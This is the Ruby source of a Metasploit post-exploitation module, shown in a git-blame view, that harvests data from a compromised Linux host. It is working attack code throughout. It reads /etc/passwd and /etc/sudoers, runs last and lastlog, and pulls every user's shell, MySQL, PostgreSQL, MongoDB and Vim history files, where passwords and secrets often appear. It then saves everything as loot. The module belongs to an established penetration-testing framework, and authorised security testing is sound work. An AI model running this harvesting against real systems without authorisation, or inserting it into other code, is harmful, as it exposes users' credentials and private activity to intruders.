metasploit-framework/modules/post/linux/gather/enum_users_history.rb

121 lines
3.6 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
2016-03-08 13:02:44 +00:00
class MetasploitModule < Msf::Post
2013-09-05 18:41:25 +00:00
include Msf::Post::File
include Msf::Post::Linux::System
2014-12-29 20:58:54 +00:00
def initialize(info = {})
super(update_info(info,
2015-01-06 07:42:52 +00:00
'Name' => 'Linux Gather User History',
'Description' => %q{
This module gathers the following user-specific information:
shell history, MySQL history, PostgreSQL history, MongoDB history,
Vim history, lastlog, and sudoers.
},
'License' => MSF_LICENSE,
'Author' =>
[
# based largely on get_bash_history function by Stephen Haywood
'ohdae <bindshell[at]live.com>'
],
'Platform' => ['linux'],
'SessionTypes' => ['shell', 'meterpreter']
))
2013-09-05 18:41:25 +00:00
end
def run
distro = get_sysinfo
2014-12-29 20:58:54 +00:00
print_good('Info:')
2013-09-05 18:41:25 +00:00
print_good("\t#{distro[:version]}")
print_good("\t#{distro[:kernel]}")
2014-12-29 20:58:54 +00:00
user = execute('/usr/bin/whoami')
2014-12-30 21:12:16 +00:00
users = execute('/bin/cat /etc/passwd | cut -d : -f 1').chomp.split
users = [user] if user != 'root' || users.blank?
2013-09-05 18:41:25 +00:00
2014-12-30 21:12:16 +00:00
vprint_status("Retrieving history for #{users.length} users")
2015-01-06 07:42:52 +00:00
shells = %w{ash bash csh ksh sh tcsh zsh}
2014-12-30 21:12:16 +00:00
users.each do |u|
home = get_home_dir(u)
2014-12-30 21:12:16 +00:00
shells.each do |shell|
get_shell_history(u, home, shell)
2014-12-30 21:12:16 +00:00
end
get_mysql_history(u, home)
get_psql_history(u, home)
get_mongodb_history(u, home)
get_vim_history(u, home)
2014-12-29 20:26:12 +00:00
end
2014-12-30 21:12:16 +00:00
2014-12-29 20:58:54 +00:00
last = execute('/usr/bin/last && /usr/bin/lastlog')
sudoers = cat_file('/etc/sudoers')
save('Last logs', last) unless last.blank?
save('Sudoers', sudoers) unless sudoers.blank? || sudoers =~ /Permission denied/
2013-09-05 18:41:25 +00:00
end
2014-12-29 20:58:54 +00:00
def save(msg, data, ctype = 'text/plain')
ltype = 'linux.enum.users'
2013-09-05 18:41:25 +00:00
loot = store_loot(ltype, ctype, session, data, nil, msg)
print_status("#{msg} stored in #{loot.to_s}")
end
def execute(cmd)
vprint_status("Execute: #{cmd}")
output = cmd_exec(cmd)
2014-12-29 20:58:54 +00:00
output
2013-09-05 18:41:25 +00:00
end
def cat_file(filename)
vprint_status("Download: #{filename}")
output = read_file(filename)
2014-12-29 20:58:54 +00:00
output
2013-09-05 18:41:25 +00:00
end
def get_home_dir(user)
home = execute("echo ~#{user}")
if home.empty?
if user == 'root'
2015-01-06 07:42:52 +00:00
home = '/root'
else
2015-01-06 07:42:52 +00:00
home = "/home/#{user}"
end
end
home
end
def get_shell_history(user, home, shell)
2014-12-30 21:12:16 +00:00
vprint_status("Extracting #{shell} history for #{user}")
hist = cat_file("#{home}/.#{shell}_history")
2015-01-06 07:42:52 +00:00
save("#{shell} history for #{user}", hist) unless hist.blank? || hist =~ /No such file or directory/
2013-09-05 18:41:25 +00:00
end
def get_mysql_history(user, home)
2014-12-30 21:12:16 +00:00
vprint_status("Extracting MySQL history for #{user}")
sql_hist = cat_file("#{home}/.mysql_history")
2015-01-06 07:42:52 +00:00
save("MySQL history for #{user}", sql_hist) unless sql_hist.blank? || sql_hist =~ /No such file or directory/
2014-12-29 20:33:22 +00:00
end
def get_psql_history(user, home)
2014-12-30 21:12:16 +00:00
vprint_status("Extracting PostgreSQL history for #{user}")
sql_hist = cat_file("#{home}/.psql_history")
2015-01-06 07:42:52 +00:00
save("PostgreSQL history for #{user}", sql_hist) unless sql_hist.blank? || sql_hist =~ /No such file or directory/
2013-09-05 18:41:25 +00:00
end
def get_mongodb_history(user, home)
2014-12-30 21:38:58 +00:00
vprint_status("Extracting MongoDB history for #{user}")
sql_hist = cat_file("#{home}/.dbshell")
2015-01-06 07:42:52 +00:00
save("MongoDB history for #{user}", sql_hist) unless sql_hist.blank? || sql_hist =~ /No such file or directory/
2014-12-30 21:38:58 +00:00
end
def get_vim_history(user, home)
2015-01-06 07:42:52 +00:00
vprint_status("Extracting Vim history for #{user}")
vim_hist = cat_file("#{home}/.viminfo")
2015-01-06 07:42:52 +00:00
save("Vim history for #{user}", vim_hist) unless vim_hist.blank? || vim_hist =~ /No such file or directory/
2013-09-05 18:41:25 +00:00
end
2015-01-06 07:42:52 +00:00
end